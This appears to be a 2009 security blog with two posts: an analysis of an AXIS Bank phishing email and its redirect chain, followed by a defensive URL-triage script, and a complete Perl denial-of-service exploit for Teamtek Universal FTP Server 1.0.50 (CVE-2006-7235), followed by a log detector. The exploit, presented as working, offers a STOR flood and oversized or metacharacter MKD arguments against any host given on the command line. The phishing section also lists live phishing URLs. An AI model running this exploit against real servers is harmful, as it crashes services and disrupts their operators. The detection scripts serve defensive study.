Wednesday, February 11, 2009

AXIS Bank Phishing 2...Be Careful!

Don't be surprised if you get a mail apparently from AXIS Bank (in fact not from AXIS Bank but from a malicious user) with the subject "MPORTANT NOTICE: Update Your Axis Bank Ltd® Net Banking Details". Notice the missing "I" in the word IMPORTANT in the subject. Most people will read "MPORTANT" as "IMPORTANT" without noticing.
The mail looks like this:
Clicking "Update Your NetBanking Account" redirects us to
http://axisaccountsummary.t35.com/axisbank.co.in/RetailSignOn.htm
which looks like this:

Type anything into the "Login ID" and "Password" text boxes and click the "Submit" button without selecting the radio buttons; this redirects us to
http://axisaccountsummary.t35.com/axisbank.co.in/authenticate.php
The authenticate.php page looks like this:

On this page we find "Download" and "Click Here" hyperlinks; clicking them redirects to
https://www.axisbank.co.in/BankAway/(b5zbwu55bnaszw55d2iyuz55)/web/L001/retail/jsp/user/%5Cdownload%5Ciconnectform.pdf
https://www.axisbank.co.in/BankAway/(b5zbwu55bnaszw55d2iyuz55)/web/L001/retail/jsp/user/%5Cdownload%5Cicoftfform.pdf
respectively. These URLs point to the real website and fetch the resource over HTTPS, and we can see the browser's lock symbol at bottom left, but we get a "The page cannot be found" error while downloading the PDFs. The phishing page mixes real bank links with fake ones to look more credible.
Enter any arbitrary data into "ATM Card No.", "ATM PIN No." and "Transaction Password" and click the "Continue" button, which redirects to
http://christkingdomorphanage.org/idbi2/accountsummary.php

I browsed to the Contact Us page (http://www.christkingdomorphanage.org/contactus.php), where the address is given as
CHRIST KINGDOM ORPHANAGE HOME
UMUEZEALAKPA ALAENYI
OGWA, MBAITOLI LGA,
IMO STATE, NIGERIA
p: (+234) 8033738658
e: http://www.christkingdomorphanage.org/info@christkingdomorphanage.org
w: http://www.christkingdomorphanage.org/

Well, going by the last hop of the redirect chain, this phishing mail most probably originates from Nigeria.
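The two tell-tale signs in this post are a lure word with a character missing in the subject and a chain of hops where the bank's domain name appears as a path segment on somebody else's host, over plain HTTP. The following script is an added example, not part of the original post, that turns those two observations into simple triage heuristics. The legitimate domain (axisbank.co.in) and the URLs are taken from the post; the similarity threshold and the finding labels are my own assumptions.

```python
"""Triage heuristics for a phishing subject line and URL chain (added example)."""
import difflib
from urllib.parse import urlparse

# Legitimate domain the lure impersonates (from the post).
BRAND_DOMAINS = ("axisbank.co.in",)

# Words a lure typically leans on; the post's subject misspells the first one.
LURE_WORDS = ("IMPORTANT", "URGENT", "VERIFY", "SUSPENDED")

# Assumption: a token this similar to a lure word, but not identical, is a near-miss.
NEAR_MISS_RATIO = 0.85


def is_brand_host(host):
    """True only when host is the brand domain itself or a subdomain of it."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS)


def url_findings(url):
    """Return the reasons one URL looks like part of a phishing chain (empty if none)."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    findings = []
    if p.scheme != "https":
        findings.append("plain-http")
    if not is_brand_host(host):
        findings.append("host-not-brand")
        # The brand's domain name used as a directory on someone else's host.
        if any(d in p.path.lower() for d in BRAND_DOMAINS):
            findings.append("brand-in-path")
    return findings


def subject_findings(subject):
    """Flag near-miss spellings of lure words, e.g. 'MPORTANT' for 'IMPORTANT'."""
    out = []
    for token in subject.upper().replace(":", " ").split():
        for word in LURE_WORDS:
            ratio = difflib.SequenceMatcher(None, token, word).ratio()
            if token != word and ratio >= NEAR_MISS_RATIO:
                out.append("%s~%s" % (token, word))
    return out


def triage_chain(urls):
    """Count the hops that raise at least one finding; returns (flagged, total)."""
    flagged = [u for u in urls if url_findings(u)]
    return len(flagged), len(urls)


# The redirect chain described in the post, in the order it was followed.
CHAIN = [
    "http://axisaccountsummary.t35.com/axisbank.co.in/RetailSignOn.htm",
    "http://axisaccountsummary.t35.com/axisbank.co.in/authenticate.php",
    "https://www.axisbank.co.in/BankAway/(b5zbwu55bnaszw55d2iyuz55)/web/L001/retail/jsp/user/%5Cdownload%5Ciconnectform.pdf",
    "https://www.axisbank.co.in/BankAway/(b5zbwu55bnaszw55d2iyuz55)/web/L001/retail/jsp/user/%5Cdownload%5Cicoftfform.pdf",
    "http://christkingdomorphanage.org/idbi2/accountsummary.php",
]

if __name__ == "__main__":
    print(subject_findings("MPORTANT NOTICE: Update Your Axis Bank Ltd Net Banking Details"))
    for hop in CHAIN:
        print(hop, "->", url_findings(hop) or "ok")
    print("suspicious hops: %d of %d" % triage_chain(CHAIN))
```

The host check deliberately compares the hostname, not the whole URL string: a filter that merely searches for "axisbank.co.in" anywhere in the link would pass the first two hops, which is exactly what the phisher is counting on.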

Safe Surfing...Enjoy!!!

Tuesday, February 3, 2009

Teamtek Universal FTP Server 1.0.50 DoS (daemon crash/ hang)

This is a working exploit for an old vulnerability whose advisory entry was updated recently.
############################################################
#
# Teamtek Universal FTP Server 1.0.50 allows remote attackers to cause a denial of service (daemon crash or hang) via (1)
# multiple STOR (aka PUT) commands, or an MKD command followed by (2) a '*' argument, (3) a '|' argument,
# (4) spaces, or (5) a long string. NOTE: the provenance of this information is unknown; the details are obtained solely
# from third party information.
#
# References:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7235
# http://www.securityfocus.com/bid/21085
#
# Tested on Windows XP SP1 with
# Universal FTP Server 1.0.44
# Banner: UNIVERSAL FTP SERVER - by Daniele Pratelli - www.teamtek.net - www.5e5.net
# With "mkdir |" command application crashes with "Run-time error '52:' Bad file name or number"
# With "mkdir *" command application crashes with "Run-time error '76:' Path not found"
#
# To run this exploit on MS Windows replace "#!/usr/bin/perl -w" with "#!Installation_path_for_perl -w"
# (say #!C:/Perl/bin/perl -w)
# This was strictly written for educational purposes. Use it at your own risk.
# Author will not bear any responsibility for any damages whatsoever.
# Author: Praveen Darhanam
# Email: praveen[underscore]recker[at]sify.com
# Date: 20th December, 2008
##########################################################
#!/usr/bin/perl -w
use strict;
use Net::FTP;

# Target host or IP is taken from the first command-line argument.
my $target = $ARGV[0]
    or die "Usage: perl script_name vuln_target_ip_or_host\n";
my $ftp_dos_mkd = Net::FTP->new($target, Debug => 0)
    or die "Cannot connect to host $target\nUsage: perl script_name vuln_target_ip_or_host\n";
$ftp_dos_mkd->login("anonymous", "anonymous") or die "Could not login...Retry";

print "Enter 1 to launch FTP DoS using multiple STOR/PUT commands\n";
print "Enter 2 to launch FTP DoS using directory name as * with MKD command\n";
print "Enter 3 to launch FTP DoS using directory name as | with MKD command\n";
print "Enter 4 to launch FTP DoS using MKD command followed by spaces\n";
print "Enter 5 to launch FTP DoS using MKD command followed by long string\n";

# Read the chosen option from standard input.
my $special_char = <STDIN>;
chomp($special_char);
if ($special_char == 1) {
    # (1) flood the server with STOR commands
    while (1) {
        $ftp_dos_mkd->stor("abc.txt");
    }
}
elsif ($special_char == 2) {
    # (2) MKD with '*' as the directory name
    $ftp_dos_mkd->mkdir("*");
}
elsif ($special_char == 3) {
    # (3) MKD with '|' as the directory name
    $ftp_dos_mkd->mkdir("|");
}
elsif ($special_char == 4) {
    # (4) MKD with a directory name made of spaces only
    my $buf1 = "\x20" x 100000;
    $ftp_dos_mkd->mkdir($buf1);
}
elsif ($special_char == 5) {
    # (5) MKD with an overly long directory name
    my $buf2 = "D" x 100000;
    $ftp_dos_mkd->mkdir($buf2);
}
else {
    print "Please enter correct number to launch exploit !!\n";
}

$ftp_dos_mkd->quit;
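Each of the five triggers above leaves a distinctive trace in the FTP command stream: an MKD whose argument is a metacharacter, whitespace only, or far longer than any real directory name, or a burst of STOR commands from one client. The following detector is an added example, not part of the original post or the exploit, that scans a command log for those patterns. It assumes a simplified, constructed log format of "<epoch_seconds> <client_ip> <COMMAND> <argument>" per line (real FTP daemons log differently, so the parser would need adapting), and the length and rate thresholds are assumptions.

```python
"""Detect the MKD and STOR abuse patterns from CVE-2006-7235 in an FTP command log (added example)."""
from collections import defaultdict, deque

MAX_MKD_ARG = 256   # assumption: no legitimate directory name is longer than this
STOR_LIMIT = 20     # assumption: more STORs than this from one client...
STOR_WINDOW = 10    # ...within this many seconds counts as a flood


def parse_line(line):
    """Split one constructed log line into (ts, ip, cmd, arg); arg keeps its spaces."""
    parts = line.rstrip("\n").split(" ", 3)
    if len(parts) < 3:
        return None
    ts, ip, cmd = parts[:3]
    arg = parts[3] if len(parts) == 4 else ""
    return int(ts), ip, cmd.upper(), arg


def mkd_finding(arg):
    """Return a finding label for an abusive MKD argument, or None for a normal one."""
    if arg in ("*", "|"):
        return "mkd-metachar:" + arg
    if arg and arg.strip() == "":
        return "mkd-spaces-only"
    if len(arg) > MAX_MKD_ARG:
        return "mkd-long-arg:%d" % len(arg)
    return None


def analyse(lines):
    """Walk the log once; return [(client_ip, finding), ...] in log order."""
    findings = []
    stor_times = defaultdict(deque)   # per-client sliding window of STOR timestamps
    flooded = set()                   # clients already reported, to avoid repeats
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, ip, cmd, arg = rec
        if cmd == "MKD":
            label = mkd_finding(arg)
            if label:
                findings.append((ip, label))
        elif cmd == "STOR":
            window = stor_times[ip]
            window.append(ts)
            while window and ts - window[0] > STOR_WINDOW:
                window.popleft()
            if len(window) > STOR_LIMIT and ip not in flooded:
                flooded.add(ip)
                findings.append((ip, "stor-flood:%d/%ds" % (len(window), STOR_WINDOW)))
    return findings


# Constructed sample log: one client tries every MKD variant, another floods STOR.
SAMPLE_LOG = [
    "1000 10.0.0.5 USER anonymous",
    "1001 10.0.0.5 PASS anonymous",
    "1002 10.0.0.5 MKD reports",        # benign
    "1003 10.0.0.5 MKD *",
    "1004 10.0.0.5 MKD |",
    "1005 10.0.0.5 MKD " + " " * 8,
    "1006 10.0.0.5 MKD " + "D" * 300,
] + ["%d 10.0.0.9 STOR abc.txt" % (1010 + i // 5) for i in range(25)]

if __name__ == "__main__":
    for ip, label in analyse(SAMPLE_LOG):
        print(ip, label)
```

The STOR window is kept per client so that a busy but legitimate site with many uploaders does not trip the rate rule, while a single source repeating the same STOR does. Both thresholds should be tuned against a baseline of the server's normal traffic before the rule is relied on.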